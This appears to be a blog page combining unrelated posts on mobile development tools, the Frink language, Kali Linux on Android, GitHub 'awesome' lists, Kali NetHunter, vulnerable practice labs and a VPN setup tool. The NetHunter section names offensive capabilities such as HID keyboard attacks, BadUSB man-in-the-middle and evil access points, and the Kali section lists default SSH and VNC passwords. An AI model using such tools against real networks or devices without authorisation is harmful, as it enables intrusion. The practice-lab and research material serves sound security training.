Price: Starts at $19 per month.

13. Sencha Touch

Sencha Touch

Sencha Touch provides JavaScript & HTML framework and development tools to build complete touch based apps in a single integrated package. It gives designers the ability to prototype applications with pixel perfect clarity, and developers a perfect code editor and interactive charts.
Price: $3855

12. Appboy


Appboy is a web tool that allows you to monitor and measure CRM, user engagement, analytics and more, in real time. You can create a relevant experience for each user and vary your outreach via in-app messages, push email and industry first news feed.
Price: Starts at $10 per month

11. ShoutEm


ShoutEm is simple and powerful mobile app creator that has everything you need to build amazing apps, without any coding skills. It is packed with drag-drop interface, CMS, analytics, monetization and publish/preview tools. Moreover, you get unlimited support, maintenance and free updates.
Price: Starts at $19.90 per month.

10. Fluid UI

Fluid UI

Fluid UI is web-based mobile prototyping tool that lets you rapidly assemble native looking mockups. You can select from 3500+ mobile, tablet and wearable widgets or upload your own image to get pixel perfect look. Moreover, you can preview/test your mockup directly in your browser and share it with clients and stakeholders.
Price: Starts at $10 per month.

9. Appcelerator


Appcelerator is an open, cloud based enterprise platform creating, delivering and analyzing your mobile app. Write an app (all in JavaScript) and it will provide you live prototyping, code optimization and full automated testing to deliver high performance app.
Price: Free

8. PhoneGap


PhoneGap allows you to easily create apps using web technologies like CSS, HTML and JavaScript. You can develop locally and then see the changes instantly on mobile device with their cross platform app. Your app is compiled in the cloud.
Price: Free/Open Source

7. Proto


Proto allows you to build fully interactive high fidelity prototypes that look and work exactly your app should (No coding skills needed). With Proto, you can test the prototype on actual device and feel the app experience with rich animations, interactions and gestures.
Price: Starts at $24 per month.

6. Mobile Roadie

Mobile Roadie

Mobile Roadie is a CMS that helps you build customizable apps with ease and update them on the fly. This cloud platform supports geo-targeted marketing campaigns, user analytics, push notification, any time content updates and packed with various engagement tools.
Price: Starts at $149 per month.

5. Parse


Parse is a complete mobile app platform that allows you to focus on creating unique apps (on any platform). It takes care of almost everything you apps need, from the core to analytics and push notification, localized documentation to crash reporting.
Price: Free for 1 concurrent job

4. Apiary


Build beautiful and clean APIs with Apiary. It will save you a lot of time for back-end and front-end discussion. It is packed with some great features like instant API mock, collaborative design, integrated code samples, generated documentation, debugging and automated testing tools.
Price: Free for 1 user.

3. GameSalad Creator

GameSalad Creator

This is the fastest game creation engine (integrated with physics engine) that lets you design and test your own game (No coding skills required). The software has a visual drag-drop interface and a deep behavior library to make game designing process fast and easy. It also shows you real and vital stats of your game performance.
Price: Free

2. Appmakr


Appmakr provides the quickest way to create a mobile app for your blog, business or community group using drag drop feature (No coding skills required). You can easily add photos, videos, maps, social feeds and more. When done, post it on Google Play and start analyzing and monetizing your app.
Price: Free

1. Genymotion


We all know starting the emulator and running an app is a slow and tedious process. Genymotion is designed to solve this problem, by providing hardware accelerated Android emulator. It supports various Android API levels and work seamlessly with Android Studio. Genymotion uses x86 architecture virtualization and packed with 20 pre-configured devices.
Price: Free for personal use.

Frink – Frink is a practical calculating tool and programming language

About Frink

Frink is a practical calculating tool and programming language designed to make physical calculations simple, to help ensure that answers come out right, and to make a tool that’s really useful in the real world. It tracks units of measure (feet, meters, kilograms, watts, etc.) through all calculations, allowing you to mix units of measure transparently, and helps you easily verify that your answers make sense. It also contains a large data file of physical quantities, freeing you from having to look them up, and freeing you to make effortless calculations without getting bogged down in the mechanics.

Perhaps you’ll get the best idea of what Frink can do if you skip down to the Sample Calculations further on this document. Come back up to the top when you’re done.

Frink was named after one of my personal heroes, and great scientists of our time, the brilliant Professor John Frink. Professor Frink noted, decades ago:

“I predict that within 100 years, computers will be twice as powerful, ten thousand times larger, and so expensive that only the five richest kings of Europe will own them.”


For those with a short attention span like me, here are some of the features of Frink.

  • Tracks units of measure (feet, meters, tons, dollars, watts, etc.) through all calculations and allows you to add, subtract, multiply, and divide them effortlessly, and makes sure the answer comes out correct, even if you mix units like gallons and liters.
  • Arbitrary-precision math, including huge integers and floating-point numbers, rational numbers (that is, fractions like 1/3 are kept without loss of precision,) complex numbers, and intervals.
  • Advanced mathematical functions including trigonometric functions (even for complex numbers,) factoring and primality testing, and base conversions.
  • Unit Conversion between thousands of unit types with a huge built-in data file.
  • Date/time math (add offsets to dates, find out intervals between times,) timezone conversions, and user-modifiable date formats.
  • Translates between several human languages, including English, French, German, Spanish, Portuguese, Dutch, Korean, Japanese, Russian, Chinese, Swedish, and Arabic.
  • Calculates historical buying power of the U.S. dollar and British pound.
  • Calculates exchange rates between most of the world’s currencies.
  • Powerful Perl-like regular expression capabilities and text processing.
  • Supports Unicode throughout, allowing processing of almost all of the world’s languages.
  • Supports Interval Arithmetic (also known as Interval Computations) in calculations, allowing you to automagically calculate error bounds and uncertainties in all of your calculations.
  • Reads HTTP and FTP-based URLs as easily as reading local files, allowing fetching of live web-based data.
  • Runs on most major operating systems (anything with Java 1.1 or later,) as an applet, through a web-based interface, on a wireless Palm VII, on an HDML- or WML-based webphone, and on many mobile phones and hand-held devices.
  • Installs itself on your system in seconds using Java Web Start and automatically keeps itself updated when new versions of Frink are released.
  • Runs with a Graphical User Interface (Swing, AWT, and Android) or a command-line interface.
  • User interface has a Programming Mode which allows you to write, edit, save, and run extremely powerful programs even on a handheld device.
  • Frink has a simple but powerful system for drawing graphics which are resizable, support transparency and anti-aliasing, and can be printed or written to image files. Graphics can also have exact lengths, so that a 3-centimeter line is three centimeters long when printed.
  • Powers Frink Server Pages, a system for providing dynamic web pages powered by Frink.
  • Frink is a full-fledged programming language with arrays, dictionaries, sets, functions, loops, even object-oriented programming and self-evaluation.
  • Frink allows Object-Oriented Programming, which allows you to create complex data structures that are still easy to use.
  • Java Introspection layer allows you to call any Java code from within Frink.
  • Frink can also be embedded in a Java program, giving your Java programs all the power of Frink.
  • Did I mention it’s free? If you find it useful, please donate something. I’d really appreciate it!


Using Frink

Try as you read

If you want to try the calculations as you’re reading, click here to open the web-based interface in a new window. The web-based interface gives hints for new users, which may make it the easiest way to learn how to use Frink.

If you have a frames-enabled browser, and you don’t see a Frink sidebar to the left, you can also click here to try Frink in a sidebar as you read this. (The sidebar mode doesn’t give as many hints, though.)

Download using Java Web Start

This method of installation requires Java Web Start, which is installed with recent versions of Java. Using Java Web Start is used to be a great way to run Frink if you don’t need to run programs from the command-line. (But you can still write and run programs from the GUI using Java Web Start!) If you do want to run programs from the command-line, see the Downloading Frink section below. Java Web Start will allow you to automatically get the latest version of Frink and will update Frink automatically when new versions are available.

Installation Steps

  1. If you don’t have a recent version of Java, you can get it from Sun. (Link opens in new window.)
  2. (Optional) If you’ve never installed anything with Java Web Start, please read and understand the FAQ entry about the security warnings you’ll see (link opens in new window) and your alternate download options.
  3. Warning: If you’re using Java version 7u51 or later, they silently and incompatibly decided to change default security settings so you’ll need to open the Java Control Panel to allow Frink to run. Otherwise you will see a dialog that says something like “Application blocked by security settings” or “Your security settings have blocked a self-signed application from running.” (This silent change was made after 12+ years of the aforementioned method working fine.)The best way to allow Frink to run is to follow the instructions listed here and add to the exceptions list in step 7.

    Note: As always, Java’s instructions and installer are terrible, and the Java Control panel on Windows may actually be under your Start menu as Java |Configure Java, or under your Windows Control Panel, or if you start your Control Panel and don’t see it, Java’s control panel will be hidden under “32-bit Control Panel.” And sometimes you’ll have multiple versions of Java installed and the one that gets started isn’t the latest version. I had lots of problems until I manually uninstalled all the versions of Java on the Windows machine, reinstalled the latest version, and uninstalled Frink and reinstalled it. Sorry about that. Windows and Java integration is terrible.

  4. Click one of the options below to install Frink with either interface (see the screenshots below):

    You can install both, actually, with no problems.

If you’ve read those security notes, and understood what the security messages are telling you, and the warnings are still too scary, (and you don’t want to send me the $400 per year it would cost me to remove at least one of them,) and you’d rather download a limited version of Frink that runs in the most restrictive security sandbox (breaking some features), then click here to install a limited version of Frink. Again, please read those security notes to see what features will be unavailable if you choose this option. You can always get the full version of Frink later if you need those features.

If someone wants to send me the $400 necessary to get a VeriSign “Code Signing Cerificate”, I’ll sign it just for you. It won’t work any differently.)

If you have an old version of Java Web Start, Frink will probably show up in the “Downloaded Applications” section of the Java Web Start panel which isn’t immediately visible. Use the View menu option to select the Downloaded Applications tab. It will also let you create a Frink shortcut on your desktop or in your start menu. The defaults in Java Web Start before version 1.4.2 are set oddly so that the second time you run Frink, it will ask you if you want to make a shortcut.

If you’re using Linux, and Sun’s Java release, only Java version 1.5 beta and later will install shortcuts onto your desktop and start menu. Highly recommended.


More information aboutu Frink can be found on: and

Information about the Android App can be found here:


Kali Linux on any Android Phone or Tablet

Getting Kali Linux to run on ARM hardware has been a major goal for us since day one. So far, we’ve built native images for the Samsung Chromebook, Odroid U2, Raspberry Pi, RK3306, Galaxy Note 10.1, CuBox, Efika MX, and BeagleBone Black to name a few. This however does not mean you cannot install Kali Linux in a chroot on almost any modern device that runs Android. In fact, the developers of Linux Deployhave made it extremely easy to get any number of Linux distributions installed in a chroot environment using a simple GUI builder.

  • A device running Android 2.1 and above, rooted.
  • At least 5 GB free space on internal or external storage.
  • A fast, wireless internet connection.
  • Patience to wait for a distribution to bootstrap from the network.
Configuring Linux Deploy for Kali

There’s actually very little to be done to get Kali installed. By choosing Kali Linux in the “Distribution” tab, you’ve pretty much covered the important stuff. Optionally, you can choose your architecture, verify that the Kali mirror is correct, set your installation type and location on your Android device, etc. Generally speaking, the defaults provided by Linux Deploy are good to begin with.

Building the Kali Image


Once you are happy with all the settings, hitting the “install” button will start a Kali Linux bootstrap directly from our repositories. Depending on your Internet connection speed, this process could take a while. You’ll be downloading a base install of Kali Linux (with no tools) at minimum.

Starting up your chrooted Kali

Once the installation is complete, you can have Linux Deploy automatically mount and load up your Kali Linux chroot image. This also includes the starting of services such as SSH and VNC for easier remote access. All of this is automagically done by hitting the “start” button. You should see Linux Deploy setting up your image with output similar to the following:


At this stage, Linux Deploy has started a VNC and SSH server inside your chrooted Kali image. You can connect to the Kali session remotely using the IP address assigned to your Android device (in my case,

Logging in to your chrooted Kali

Now you can use either a SSH or VNC client to access your Kali instance. The VNC password is “changeme” and the SSH credentials are “android” for the username (configured via Linux Deploy) and “changeme” as the password.

muts@slim:~$ ssh android@
android@ password:
Linux localhost 3.4.5-447845 #1 SMP PREEMPT Fri Apr 12 17:22:34 KST 2013 armv7l
Kali GNU/Linux 1.0 [running on Android via Linux Deploy]
android@localhost:~$ sudo su
root@localhost:/home/android# df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/loop3 4180944 667268 3304012 17% /
tmpfs 952708 80 952628 1% /dev
tmpfs 952708 0 952708 0% /dev/shm
root@localhost:/home/android# apt-get update
Hit kali Release.gpg
Hit kali Release
Hit kali/main Sources
Hit kali/contrib Sources
Hit kali/non-free Sources
Hit kali/main armel Packages
Hit kali/contrib armel Packages
Hit kali/non-free armel Packages
Ign kali/contrib Translation-en_US
Ign kali/contrib Translation-en
Ign kali/main Translation-en_US
Ign kali/main Translation-en
Ign kali/non-free Translation-en_US
Ign kali/non-free Translation-en
Reading package lists… Done
Image Size Considerations

If left unchanged, Linux Deploy will automatically set an image size of around 4 GB, for a “naked” installation of Kali. If you would like to install additional Kali tools down the road, you might want to consider using a larger image size, which is configurable via the settings in Linux Deploy.

Local VNC Connections

We had to try a couple of VNC clients to get one to work properly. Although controlling Kali through a local VNC client isn’t the most convenient of tasks, it certainly is possible. However, we suspect that most people will be SSH’ing into this instance. The picture below was overlayed with a Kali Linux desktop screenshot taken from a Galaxy S4.


Anyone fancy a simple smartphonehardware backdoor?

IRC Nachrichten per WhatsApp senden und empfangen

MASSIVE COLLECTIONS: Awesome, Awesome All, Awesome-Awesome, Awesome-Awesomes, Awesome Awesomeness, Awesome-Collection, Lists, Lists Of Github Lists, List of Lists, Must-Watch-List and Wiki China Lists


A curated list of awesome lists
For more info check:


Programming languages

Front-end development

Back-end development

Computer science

Big data



Awesome All

A curated list of all the awesome lists of awesome frameworks, libraries and software
For more info check:


Please take a quick gander at the contribution guidelines first. Thanks to all contributors; you rock!



A curated list of awesome curated lists! Inspired by inspiration.
For more info check:

Awesome Awesome

A curated list of amazingly awesome curated lists of amazingly awesome libraries, resources and shiny things for various languages and frameworks.
For more info check:



Common Lisp










Awesome collection of awesome lists of libraries, tools, frameworks and software for any programming language, or closely related :D
For more info check:

Feel free to add new lists or categories! Remember, it’s not mandatory that name starts with awesome- ;)

Programming languages | Frameworks, platforms, etc | Related and useful

Programming Languages


  • Awesome C – A curated list of awesome C libraries, frameworks and other shinies.


  • Awesome Clojure – A curated list of awesome clojure libraries and software

Common Lisp

  • Awesome Common Lisp – A curated list of awesome Common Lisp libraries, software and other shinies.


  • Awesome D – A curated list of awesome D documents, frameworks, libraries and software


  • Awesome Elixir – A curated list of amazingly awesome Elixir libraries, resources and shiny things



  • Awesome Go – A curated list of awesome Go frameworks, libraries and software


  • Awesome Haskell – A curated list of awesome Haskell frameworks, libraries and software



  • Awesome JavaScript – A curated list of amazingly awesome browser-side JavaScript libraries, resources and shiny things


  • Awesome PHP – A curated list of amazingly awesome PHP libraries, resources and shiny things


  • Awesome Python – A curated list of awesome Python frameworks, libraries and software



  • Awesome Scala – A curated list of awesome Scala frameworks, libraries and software

Frameworks, platforms, etc



  • Awesome Node.js – A curated list of astonishing Node.js frameworks, libraries and resources

Ruby on Rails

  • Awesome Rails – A curated list of amazingly awesome open source rails related resources


Related and useful



  • Awesome Dev Env – A curated list of awesome tools, resources and workflow tips making an awesome development environment.


  • Awesome Shell – A curated list of awesome command-line frameworks, toolkits, guides and gizmos


  • Awesome Sysadmin – A curated list of amazingly awesome open source sysadmin resources


  • Awesome Talks – List of online talks that you would love to watch


  • Awesome Machine Learning – A curated list of awesome machine learning frameworks, libraries and software (by language).


  • Awesome Awesomes – This one!! ;) Awesome collection of awesome lists of libraries, tools, frameworks and software for any programming language :D
  • Awesome Awesomeness – A curated list of awesome awesomeness
  • Awesome Awesome – A curated list of awesome curated lists! Inspired by inspiration

Awesome Awesomeness

A curated list of amazingly awesome awesomeness. Also available on:
And Github:

Awesome Awesome

A curated list of awesome curated lists of many topics, can also found on:

Computer management

  • awesome-shell – Command-line frameworks, toolkits, guides and gizmos.
  • awesome-sysadmin – Backups, configuration management, DNS, IMAP/POP3, LDAP, monitoring, SSH, statistics, troubleshooting, virtualization, VPN and more.

Data processing

Programming languages

  • awesome-clojure – Package management, audio, HTTP, database, websocket and testing.
  • awesome-c – C frameworks, libraries, resources and other cool stuff.
  • awesome-cpp – C/C++ frameworks, libraries, and resources.
  • awesome-cobol – Web frameworks, template engine, forms, authentication & OAuth, database, e-mail, messaging, imagery, text processing, machine learning, testing, audio, video and logging.
  • awesome-common-lisp – Common Lisp frameworks, libraries, resources and other shinies.
  • awesome-d – Build tools, compilers, IDE, GUI, database clients.
  • awesome-elixir – Elixir libraries, resources and shiny things.
  • awesome-go – Go frameworks, libraries and software.
  • awesome-java – Build tool, code analysis, database, GUI, IDE, JSON, machine learning, PDF, science, testing and web crawling.
  • awesome-javascript – JavaScript libraries, resources and shiny things.
  • awesome-julia – List of Julia resources and packages.
  • awesome-perl – Benchmarks, databases, images, logging, profiling, testing, text processing and web frameworks.
  • awesome-php – Frameworks, templating, URL, e-mail, files, imagery, testing, security, documentation, geolocation, date, PDF, search and authentication.
  • awesome-python – Files, dates, text processing, NLP, imagery, audio, video, geolocation, web frameworks, OAuth, web crawling, networking, GUI, game development, testing, science and data analysis and machine learning.
  • [awesome-R] – Not yet! Do it yourself!
  • awesome-ruby – Ruby libraries, tools, frameworks and software
  • awesome-scala – Scala frameworks, libraries and software.
  • awesome-swift – Swift documentation, projects, tutorials, updates, etc


  • [awesome-biology] – Not yet! Do it yourself!
  • [awesome-chemistry] – Not yet! Do it yourself!
  • [awesome-geography] – Not yet! Do it yourself!
  • [awesome-math] – Not yet! Do it yourself!
  • [awesome-physics] – Not yet! Do it yourself!

Web browsers

  • [awesome-firefox] – Not yet! Do it yourself!


  • [awesome-github] – Not yet! Do it yourself!
  • [awesome-flickr] – Not yet! Do it yourself!
  • [awesome-twitter] – Not yet! Do it yourself!
  • awesome-wikipedia – Datasets, frameworks, libraries and other software related to Wikipedia.
  • [awesome-youtube] – Not yet! Do it yourself!

Web platforms


  • [awesome-music] – Not yet! Do it yourself!


a list of awesome repos
For more info check:

awesome lists

  • Awesome – A curated list of awesome lists
  • awesome-all – A curated list of awesome lists of awesome frameworks, libraries and software
  • awesome-awesome by @emijrp – A curated list of awesome curated lists of many topics.
  • awesome-awesome by @erichs – A curated list of awesome curated lists! Inspired by inspiration.
  • awesome-awesome by @oyvindrobertsen – A curated list of curated lists of libraries, resources and shiny things for various languages.
  • awesome-awesomeness – A curated list of awesome awesomeness
  • awesome-awesomes – Awesome collection of awesome lists of libraries, tools, frameworks and software for any programming language
  • lists – The definitive list of (awesome) lists curated on GitHub. (comment: No awesome, but more awesome)

Programming languages



The definitive list of (awesome) lists curated on GitHub.
For more info check:
List of useful, silly and awesome lists curated on GitHub. Contributions welcome!




Lists of lists

  • awesome – A curated list of awesome lists.
  • awesome-all – A curated list of awesome lists of awesome frameworks, libraries and software
  • awesome-awesome by @emijrp – A curated list of awesome curated lists of many topics.
  • awesome-awesome by @erichs – A curated list of awesome curated lists! Inspired by inspiration.
  • awesome-awesome by @oyvindrobertsen – A curated list of curated lists of libraries, resources and shiny things for various languages.
  • awesome-awesomeness – A curated list of awesome awesomeness
  • awesome-awesomes – Awesome collection of awesome lists of libraries, tools, frameworks and software for any programming language
  • awesome-collection – A list of awesome repos.
  • ListOfGithubLists – List of github lists
  • list-of-lists – A meta list of lists of useful open source projects and developer tools.
  • must-watch-list – List of must-watch lists.
  • this one
  • wiki In Chinese – A curated list of awesome lists.

Lists of lists of lists

Lists of lists of lists of lists

Lists of lists of lists of lists of lists

List of github lists

Creating a github list is so trendy nowadays, so here’s another one.
Fore more info check:

Pull requests are welcome



A meta list of lists of useful open source projects and developer tools
For more info check:


Frameworks / Libraries


Other lists of lists



A list of must-watch lists
For more info check:

Overview of all lists from this post:
Awesome All:
Awesome Awesome:
Awesome Awesome:
List Of Github Lists:
Wiki China Lists:

Awesome-Awesomeness (zeef):

Kali Linux NetHunter on Android devices for Nexus and OnePlus.

For over a year now, Offensive Security have obsessively been building Kali on weird and wonderful ARM hardware and today, we are proud to reveal our latest creation – the Kali Linux NetHunter. NetHunter is a Android penetration testing platform for Nexus and OnePlus devices built on top of Kali Linux, which includes some special and unique features. Of course, you have all the usual Kali tools in NetHunter as well as the ability to get a full VNC session from your phone to a graphical Kali chroot, however the strength of NetHunter does not end there.

They have incorporated some amazing features into the NetHunter OS which are both powerful and unique. From pre-programmed HID Keyboard (Teensy) attacks, to BadUSB Man In The Middle attacks, to one-click MANA Evil Access Point setups. And yes, NetHunter natively supports wireless 802.11 frame injection with a variety of supported USB NICs. NetHunter is still in its infancy and they are looking forward to seeing this project and community grow.


Supported Devices

The Kali NetHunter image is currently compatible with the following Nexus and OnePlus devices:
-Nexus 4 (GSM) – “mako”
-Nexus 5 (GSM/LTE) – “hammerhead”
-Nexus 7 [2012] (Wi-Fi) – “nakasi”
-Nexus 7 [2012] (Mobile) – “nakasig”
-Nexus 7 [2013] (Wi-Fi) – “razor”
-Nexus 7 [2013] (Mobile) – “razorg”
-Nexus 10 (Tablet) – “mantaray”
-OnePlus One 16 GB – “bacon”
-OnePlus One 64 GB – “bacon”

More Info can be found on:

Info about the OnePluse One can be found on:

Penetration Testing Practice Lab – Vulnerable Apps / Systems (The Most Complete List)

A complete mindmap about all the courses and trainings from this post can be found here:

Following table gives the URLs of all the vulnerable web applications, operating system installations, old software and war games [hacking] sites. The URLs for individual applications that are part of other collection entities were not given as it is not necessary to download each of them and manually configure them if they are already available in a configured state. For technologies used in each web application, please refer to the mindmap above.

Vulnerable Web Applications:
OWASP Hackademic:
OWASP SiteGenerator:
OWASP Bricks: &
OWASP Security Shepherd:
Damn Vulnerable Web App (DVWA):
Damn Vulnerable Web Services (DVWS):
Butterfly Security Project:
Foundstone Hackme Bank:
Foundstone Hackme Books:
Foundstone Hackme Casino:
Foundstone Hackme Shipping:
Foundstone Hackme Travel:
WackoPicko: &
WebSecurity Dojo:
BodgeIt Store:
Exploit KB Vulnerable Web App: &
PHDays iBank CTF:
Drunk Admin Web Hacking Challenge:
bWAPP: & &
NOWASP / Mutillidae 2:
Project GameOver:
OWASP Vicnum Project: &
Hackademic Challenges:

Vulnerable Operating System Installations:
Damn Vulnerable Linux: &
Metasploitable: &
UltimateLAMP: &
heorot: DE-ICE, hackerdemia
DE-ICE, hackerdemia:
DE-ICE, hackerdemia:
DE-ICE, hackerdemia:
DE-ICE, hackerdemia:
De-ICE HackerPedia PenTest LiveCDs
pWnOS: & &
Holynix: &
exploit-exercises – nebula, protostar, fusion:
PenTest Laboratory:
RebootUser Vulnix:
SecGame # 1 Sauron:
Pentester Lab:
TurnKey Linux:
Elastic Server:
Virtual Hacking Lab:

Sites for Downloading Older Versions of Various Software:
Old Version:
Old Apps:
VirtualHacking Repo:

Sites by Vendors of Security Testing Software:
Acunetix acuforum:
Acunetix acublog:
Acunetix acuart:
Cenzic crackmebank:
HP freebank:
IBM altoromutual:
Mavituna testsparker:
Mavituna testsparker:
NTOSpider Test Site:

Sites for Improving Your Hacking Skills:
Exploit Exercises:
Google Gruyere:
Gh0st Lab:
Hack This Site:
Hacker Challenge:
Hacker Test:
hACME Game:
Root Me:
Security Treasure Hunt:
Smash The Stack:
TheBlackSheep and Erik:
XSS – Can You XSS This?:
XSS – ProgPHP:

CTF Sites / Archives:
CTFtime (Details of CTF Challenges):
shell-storm Repo:

Mobile Apps:
ExploitMe Mobile Android Labs:
ExploitMe Mobile iPhone Labs:
OWASP iGoat:
OWASP Goatdroid:
Damn Vulnerable iOS App (DVIA):
Damn Vulnerable Android App (DVAA):
Damn Vulnerable FirefoxOS Application (DVFA):
NcN Wargame:
Hacme Bank Android:


Android Mobile Bootcamp Training

The bootcamp training website for android:

Getting Started

Totally new to Android? Start here.


Exploring the foundations of app development:

Views and Layouts

Exploring the gritty details of views, layout, styling and common UI patterns:

Designing and Styling Views


Interaction and Navigation

Exploring how to allow user interaction and navigation within an app:

Networking, Models and Persistence

Diving into the networking, model and persistence layers for data-driven apps:


Understanding how to build powerful and flexible views using Fragments:

Providers, Sensors and Components

Exploring sensors, data and components available via the Android SDK:


Digging into how to run background services or leverage Android system services:

Workflow Guides

Focused on issues like deployment, testing, dependency management, etc:

Programming Guides for Java/android

Documents from Mobile Security Technologies 2014

Data Driven Authentication: On the Effectiveness of User Behaviour Modelling with Mobile Device Sensors [Paper] [Slides]
Gunes Kayacik, Mike Just, Lynne Baillie (Glasgow Caledonian University), David Aspinall (University of Edinburgh) and Nicholas Micallef (Glasgow Caledonian University)

Differentially Private Location Privacy in Practice [Paper] [Slides]
Vincent Primault, Sonia Ben Mokhtar (LIRIS / Université de Lyon), Cédric Lauradoux (INRIA) and Lionel Brunie (LIRIS / Université de Lyon)

Location Privacy without Carrier Cooperation [Paper] [Slides]
Keen Sung, Brian Neil Levine and Marc Liberatore (University of Massachusetts Amherst)

An Application Package Configuration Approach to Mitigating Android SSL Vulnerabilities [Paper] [Slides]
Vasant Tendulkar and William Enck (North Carolina State University)

Two Novel Defenses against Motion-Based Keystroke Inference Attacks [Paper] [Slides]
Yihang Song, Madhur Kukreti, Rahul Rawat and Urs Hengartner (University of Waterloo)

Sprobes: Enforcing Kernel Code Integrity on the TrustZone Architecture [Paper] [Slides]
Xinyang Ge, Hayawardh Vijayakumar and Trent Jaeger (The Pennsylvania State University)

Enter Sandbox: Android Sandbox Comparison [Paper] [Slides]
Sebastian Neuner (SBA Research), Victor van der Veen (VU University Amsterdam), Martina Lindorfer (Vienna University of Technology), Markus Huber, Georg Merzdovnik, Martin Mulazzani and Edgar Weippl (SBA Research)

Andlantis: Large-scale Android Dynamic Analysis [Paper] [Slides]
Michael Bierma (Sandia National Laboratories), Eric Gustafson (University of California, Davis), Jeremy Erickson, David Fritz and Yung Ryn Choe (Sandia National Laboratories)

A Systematic Security Evaluation of Android’s Multi-User Framework [Paper] [Slides]
Paul Ratazzi, Yousra Aafer, Amit Ahlawat, Hao Hao, Yifei Wang and Wenliang Du (Syracuse University)

A First Look at Firefox OS Security [Paper] [Slides]
Daniel Defreez (University of California, Davis), Bhargava Shastry (Technische Universität Berlin), Hao Chen (University of California, Davis) and Jean-Pierre Seifert (Technische Universität Berlin)

Code Injection Attacks on HTML5-based Mobile Apps [Paper] [Slides]
Xing Jin, Tongbo Luo, Derek G. Tsui and Wenliang Du (Syracuse University)


Create your very own perfectly configured VPS full automatically to encrypt and mask all internet connections for any connected device.

Streisand is an auto configuration program that runs various scripts to setup your own Virtual Private Server (VPS) with all the additional needed programs and configuration to bring encryption to all your internet connections for any device that connects with this server. Very handy and useful to protect your internet connection on a device with less security, like a mobile phone. Highly recommended for those that willing to run their own service, but don’t really have all that knowledge to set this up.

Streisand is compatible with newly registered servers from Amazon EC2, DigitalOcean, Linode and RackSpace (more providers will be added in the future)
It need to be setup from a machine running Linux, BSD or OS X that have installed Python 2.7.

Services that will be installed on the virtual private server (VPS) are:
-L2TP/IPsec with StrongSwan and Xl2tpd.
-OpenSSH with Sshuttle and Tinyproxy.
-OpenVPN with Dnsmasq.
-Shadowsocks with Dante.
-Sslh for Nginx, OpenSSH and OpenVPN.
-Stunnel for wrapping OpenVPN connections and connecting on Android with SSLDroid,
-Tor bridge relay and Obfsproxy with Obfs3 or ScrambleSuit.
-SSL certificates and SSL private keys.
-Creates zero log files.

After installing it creates custom configuration instructions for all the installed services, and makes an HTML file with instructions that can be shared with anyone who you want to connect it’s device with your server.

Click to see the latest prices to rent a sever from: Amazon EC2, DigitalOcean, Linode and RackSpace

Installation instructions for Streisand can be found down here: